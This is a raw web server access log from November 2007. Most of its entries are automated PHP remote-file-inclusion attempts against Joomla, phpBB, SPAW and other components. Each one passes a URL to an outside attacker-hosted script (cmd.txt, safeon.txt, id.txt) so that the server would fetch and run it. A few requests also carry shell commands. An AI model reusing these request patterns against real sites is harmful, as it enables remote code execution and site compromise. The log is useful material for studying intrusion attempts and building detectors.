80.74.144.95 - - [18/Nov/2007:16:01:47 -0800] "GET /logs//include.php?path[docroot]=http://www.itshocks.us/m_hotties/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.74.144.95 - - [18/Nov/2007:16:01:47 -0800] "GET //include.php?path[docroot]=http://www.itshocks.us/m_hotties/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.205.214.163 - - [18/Nov/2007:16:01:49 -0800] "GET /logs/access_071029.log//skin/zero_vote/error.php?dir=http://www.bassanesi.com.br/atk/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.205.214.163 - - [18/Nov/2007:16:01:49 -0800] "GET //skin/zero_vote/error.php?dir=http://www.bassanesi.com.br/atk/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.205.214.163 - - [18/Nov/2007:16:01:50 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.bassanesi.com.br/atk/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
63.148.182.6 - - [18/Nov/2007:16:02:15 -0800] "GET /logs/access_071028.log/index.php3?lang=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
63.148.182.6 - - [18/Nov/2007:16:02:18 -0800] "GET /logs/access_071028.log/index.php3?lang=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
63.148.182.6 - - [18/Nov/2007:16:02:20 -0800] "GET /logs/access_071028.log/index.php3?lang=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
213.246.55.29 - - [18/Nov/2007:16:02:46 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.205.214.163 - - [18/Nov/2007:16:02:49 -0800] "GET /logs/access_071015.log/index.php?inc=http://www.bassanesi.com.br/atk/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.205.214.163 - - [18/Nov/2007:16:02:49 -0800] "GET /index.php?inc=http://www.bassanesi.com.br/atk/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.205.214.163 - - [18/Nov/2007:16:02:50 -0800] "GET /logs/index.php?inc=http://www.bassanesi.com.br/atk/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.205.214.163 - - [18/Nov/2007:16:03:12 -0800] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.bassanesi.com.br/atk/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.205.214.163 - - [18/Nov/2007:16:04:36 -0800] "GET //skin/zero_vote/error.php?dir=http://www.bassanesi.com.br/atk/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.149.115.250 - - [18/Nov/2007:16:04:54 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.207.157.44 - - [18/Nov/2007:16:05:45 -0800] "GET /logs/index2.php?page=http://www.ownsyou.kit.net/vvvvv/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.62" "www.galf.org"
200.207.157.44 - - [18/Nov/2007:16:05:45 -0800] "GET /index2.php?page=http://www.ownsyou.kit.net/vvvvv/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.62" "www.galf.org"
207.210.91.2 - - [18/Nov/2007:16:05:56 -0800] "GET /logs/access_070917.log/?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
207.210.91.2 - - [18/Nov/2007:16:05:56 -0800] "GET /?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.808"
207.210.91.2 - - [18/Nov/2007:16:05:56 -0800] "GET /logs/?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 200 5371 "-" "libwww-perl/5.808"
207.210.91.2 - - [18/Nov/2007:16:05:56 -0800] "GET /logs/access_070730.log/?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.40.206.221 - - [18/Nov/2007:16:05:56 -0800] "GET /logs/access_070723.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.urjb.com/photos/albums/userpics/10001/thumb_blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.40.206.221 - - [18/Nov/2007:16:05:56 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.urjb.com/photos/albums/userpics/10001/thumb_blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.40.206.221 - - [18/Nov/2007:16:05:57 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.urjb.com/photos/albums/userpics/10001/thumb_blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.249.73.202 - - [18/Nov/2007:16:06:24 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)" "www.galf.org"
66.249.73.202 - - [18/Nov/2007:16:06:24 -0800] "GET /cendoc/pdf/Galf-Contextosocial.pdf HTTP/1.1" 404 275 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)" "www.galf.org"
213.246.55.29 - - [18/Nov/2007:16:06:51 -0800] "GET /logs/access_071028.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.246.55.29 - - [18/Nov/2007:16:06:51 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.74.45.222 - - [18/Nov/2007:16:07:03 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.205.214.163 - - [18/Nov/2007:16:08:06 -0800] "GET /logs/access_071001.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.bassanesi.com.br/atk/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.74.45.222 - - [18/Nov/2007:16:08:25 -0800] "GET /logs/access_070910.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.74.45.222 - - [18/Nov/2007:16:08:29 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.74.45.222 - - [18/Nov/2007:16:08:36 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.210.91.2 - - [18/Nov/2007:16:09:00 -0800] "GET /?mosConfig_absolute_path=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.808" "www.galf.org"
77.232.72.80 - - [18/Nov/2007:16:09:15 -0800] "GET / HTTP/1.0" 200 1032 "-" "-" "galf.org"
77.232.72.80 - - [18/Nov/2007:16:09:16 -0800] "GET / HTTP/1.0" 200 1032 "-" "-" "galf.org"
195.205.214.163 - - [18/Nov/2007:16:09:30 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.bassanesi.com.br/atk/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.205.214.163 - - [18/Nov/2007:16:09:56 -0800] "GET /logs/access_070709.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.bassanesi.com.br/atk/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.205.214.163 - - [18/Nov/2007:16:09:57 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.bassanesi.com.br/atk/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.205.214.163 - - [18/Nov/2007:16:09:57 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.bassanesi.com.br/atk/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
195.205.214.163 - - [18/Nov/2007:16:14:55 -0800] "GET /logs/access_070917.log/index.php?inc=http://www.bassanesi.com.br/atk/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
147.202.41.39 - - [18/Nov/2007:16:15:27 -0800] "GET /logs/access_070827.log/admin/editor2/spaw_control.class.php?spaw_root=http://content.afenya.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
218.55.227.178 - - [18/Nov/2007:16:16:47 -0800] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://s144729519.onlinehome.fr/insim/images/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.55.227.178 - - [18/Nov/2007:16:16:48 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://s144729519.onlinehome.fr/insim/images/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.22.170 - - [18/Nov/2007:16:17:09 -0800] "GET /logs/access_070826.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
69.74.45.222 - - [18/Nov/2007:16:17:52 -0800] "GET /logs/access_070910.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.74.45.222 - - [18/Nov/2007:16:17:55 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
85.234.133.173 - - [18/Nov/2007:16:17:57 -0800] "GET /logs/access_070625.log/claroline/learnPath/include/scormExport.inc.php?cmd=ls-la&includePath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.234.133.173 - - [18/Nov/2007:16:17:57 -0800] "GET /claroline/learnPath/include/scormExport.inc.php?cmd=ls-la&includePath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.234.133.173 - - [18/Nov/2007:16:17:58 -0800] "GET /logs/claroline/learnPath/include/scormExport.inc.php?cmd=ls-la&includePath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.74.45.222 - - [18/Nov/2007:16:18:00 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
122.153.16.5 - - [18/Nov/2007:16:18:24 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.234.133.173 - - [18/Nov/2007:16:20:07 -0800] "GET /logs/access_071029.log//inc/header.php/step_one.php?server_inc=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
85.234.133.173 - - [18/Nov/2007:16:20:07 -0800] "GET //inc/header.php/step_one.php?server_inc=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.234.133.173 - - [18/Nov/2007:16:20:07 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.234.133.173 - - [18/Nov/2007:16:20:09 -0800] "GET /logs/access_071028.log//inc/header.php/step_one.php?server_inc=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
147.202.41.39 - - [18/Nov/2007:16:20:33 -0800] "GET /logs/access_070702.log/admin/editor2/spaw_control.class.php?spaw_root=http://content.afenya.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.72 - - [18/Nov/2007:16:20:50 -0800] "GET /logs//admin/includes/admin_header.php?level=http://www.webdiodos.gr/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.72 - - [18/Nov/2007:16:20:50 -0800] "GET /logs//admin/includes/admin_header.php?level=http://www.webdiodos.gr/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.72 - - [18/Nov/2007:16:20:50 -0800] "GET //admin/includes/admin_header.php?level=http://www.webdiodos.gr/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.72 - - [18/Nov/2007:16:20:50 -0800] "GET //admin/includes/admin_header.php?level=http://www.webdiodos.gr/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
218.55.227.178 - - [18/Nov/2007:16:21:31 -0800] "GET /logs/access_071001.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://s144729519.onlinehome.fr/insim/images/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.186.86.212 - - [18/Nov/2007:16:22:07 -0800] "GET /logs/access_070827.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://uzzino1990.altervista.org/cartella/cmdx9.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
202.186.86.212 - - [18/Nov/2007:16:22:07 -0800] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://uzzino1990.altervista.org/cartella/cmdx9.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.186.86.212 - - [18/Nov/2007:16:22:08 -0800] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://uzzino1990.altervista.org/cartella/cmdx9.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
202.186.86.212 - - [18/Nov/2007:16:22:18 -0800] "GET /logs/access_070827.log//modules/4nAlbum/public/displayCategory.php?basepath=http://uzzino1990.altervista.org/cartella/cmdx9.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.186.86.212 - - [18/Nov/2007:16:22:19 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://uzzino1990.altervista.org/cartella/cmdx9.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.186.86.212 - - [18/Nov/2007:16:22:19 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://uzzino1990.altervista.org/cartella/cmdx9.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.58.168.184 - - [18/Nov/2007:16:22:32 -0800] "GET /logs/access_071014.log//phpBB/admin/admin_styles.php?mode=http://www.kuba-cuba.com/guestbook/public/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.168.184 - - [18/Nov/2007:16:22:32 -0800] "GET //phpBB/admin/admin_styles.php?mode=http://www.kuba-cuba.com/guestbook/public/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.168.184 - - [18/Nov/2007:16:22:32 -0800] "GET /logs/access_071014.log//phpBB/admin/admin_styles.php?mode=http://www.kuba-cuba.com/guestbook/public/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
207.58.168.184 - - [18/Nov/2007:16:22:32 -0800] "GET /logs//phpBB/admin/admin_styles.php?mode=http://www.kuba-cuba.com/guestbook/public/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.168.184 - - [18/Nov/2007:16:22:32 -0800] "GET //phpBB/admin/admin_styles.php?mode=http://www.kuba-cuba.com/guestbook/public/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.168.184 - - [18/Nov/2007:16:22:32 -0800] "GET /logs//phpBB/admin/admin_styles.php?mode=http://www.kuba-cuba.com/guestbook/public/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
147.202.41.39 - - [18/Nov/2007:16:22:41 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://content.afenya.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.186.86.212 - - [18/Nov/2007:16:22:43 -0800] "GET /logs/access_070903.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://uzzino1990.altervista.org/cartella/cmdx9.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
147.202.41.39 - - [18/Nov/2007:16:22:51 -0800] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://content.afenya.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.186.86.212 - - [18/Nov/2007:16:22:51 -0800] "GET /logs/access_070903.log//modules/4nAlbum/public/displayCategory.php?basepath=http://uzzino1990.altervista.org/cartella/cmdx9.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
147.202.41.39 - - [18/Nov/2007:16:23:12 -0800] "GET /logs/access_071015.log/admin/spaw/spaw_control.class.php?spaw_root=http://content.afenya.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
147.202.41.39 - - [18/Nov/2007:16:23:15 -0800] "GET /logs/access_071014.log/admin/spaw/spaw_control.class.php?spaw_root=http://content.afenya.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
217.149.115.250 - - [18/Nov/2007:16:24:14 -0800] "GET /logs/access_071022.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.149.115.250 - - [18/Nov/2007:16:24:15 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.55.227.178 - - [18/Nov/2007:16:25:23 -0800] "GET /logs/access_070917.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://s144729519.onlinehome.fr/insim/images/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.55.227.178 - - [18/Nov/2007:16:25:24 -0800] "GET /logs/access_070827.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://s144729519.onlinehome.fr/insim/images/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.25.195.72 - - [18/Nov/2007:16:26:10 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.webdiodos.gr/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.25.195.72 - - [18/Nov/2007:16:26:10 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.webdiodos.gr/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.149.115.250 - - [18/Nov/2007:16:26:38 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.74.45.222 - - [18/Nov/2007:16:28:52 -0800] "GET /logs/access_070716.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.74.45.222 - - [18/Nov/2007:16:28:56 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.74.45.222 - - [18/Nov/2007:16:29:00 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.214.44.193 - - [18/Nov/2007:16:29:30 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://ruggedorb.com/auctions/phpAdsNew/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.214.44.193 - - [18/Nov/2007:16:29:30 -0800] "GET //phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=http://ruggedorb.com/auctions/phpAdsNew/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
88.244.7.58 - - [18/Nov/2007:16:30:11 -0800] "GET /logs/index.php?go=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.244.7.58 - - [18/Nov/2007:16:30:11 -0800] "GET /index.php?go=http://www.waldemarnowakowski.com/chat/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.58.168.184 - - [18/Nov/2007:16:31:40 -0800] "GET /logs/access_070716.log//phpBB/admin/admin_styles.php?mode=http://www.kuba-cuba.com/guestbook/public/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.168.184 - - [18/Nov/2007:16:31:44 -0800] "GET /logs/access_070716.log//phpBB/admin/admin_styles.php?mode=http://www.kuba-cuba.com/guestbook/public/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.74.45.222 - - [18/Nov/2007:16:33:39 -0800] "GET /logs/access_070903.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.214.44.193 - - [18/Nov/2007:16:33:55 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ruggedorb.com/auctions/phpAdsNew/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.180.250.70 - - [18/Nov/2007:16:34:49 -0800] "GET /logs/access_071001.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
64.13.223.63 - - [18/Nov/2007:16:35:25 -0800] "GET /logs//modules/coppermine/themes/default/theme.php?http://port-forward.net/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.13.223.63 - - [18/Nov/2007:16:35:25 -0800] "GET //modules/coppermine/themes/default/theme.php?http://port-forward.net/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
72.30.216.90 - - [18/Nov/2007:16:36:37 -0800] "GET /logs/access_070730.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
147.202.41.39 - - [18/Nov/2007:16:40:22 -0800] "GET /logs/access_070827.log/admin/spaw/spaw_control.class.php?spaw_root=http://content.afenya.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.208.16.34 - - [18/Nov/2007:16:40:41 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.fruitsalad.tv/chat/inc/cmses/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
74.208.16.34 - - [18/Nov/2007:16:40:41 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.fruitsalad.tv/chat/inc/cmses/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
68.180.250.101 - - [18/Nov/2007:16:43:05 -0800] "GET /logs/access_071014.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
217.149.115.250 - - [18/Nov/2007:16:44:19 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.149.115.250 - - [18/Nov/2007:16:44:21 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.208.16.34 - - [18/Nov/2007:16:47:24 -0800] "GET /logs/index.php?go=http://www.fruitsalad.tv/chat/inc/cmses/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
74.208.16.34 - - [18/Nov/2007:16:47:24 -0800] "GET /index.php?go=http://www.fruitsalad.tv/chat/inc/cmses/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
72.30.216.103 - - [18/Nov/2007:16:48:47 -0800] "GET /logs/access_070813.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
69.74.45.222 - - [18/Nov/2007:16:49:46 -0800] "GET /logs/access_070903.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.30.214.230 - - [18/Nov/2007:16:52:34 -0800] "GET /logs/access_071014.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
64.13.223.63 - - [18/Nov/2007:16:56:49 -0800] "GET /logs/access_070820.log//modules/coppermine/themes/default/theme.php?http://port-forward.net/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
68.180.250.118 - - [18/Nov/2007:16:58:05 -0800] "GET /logs/access_070723.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
64.13.223.63 - - [18/Nov/2007:17:01:08 -0800] "GET /logs/access_070702.log//modules/coppermine/themes/default/theme.php?http://port-forward.net/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.177.26.135 - - [18/Nov/2007:17:01:20 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://telkomsex.com/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.22.170 - - [18/Nov/2007:17:03:32 -0800] "GET /logs/access_070820.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
166.70.169.66 - - [18/Nov/2007:17:04:27 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://bondick.net/flashchat/nick_image/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
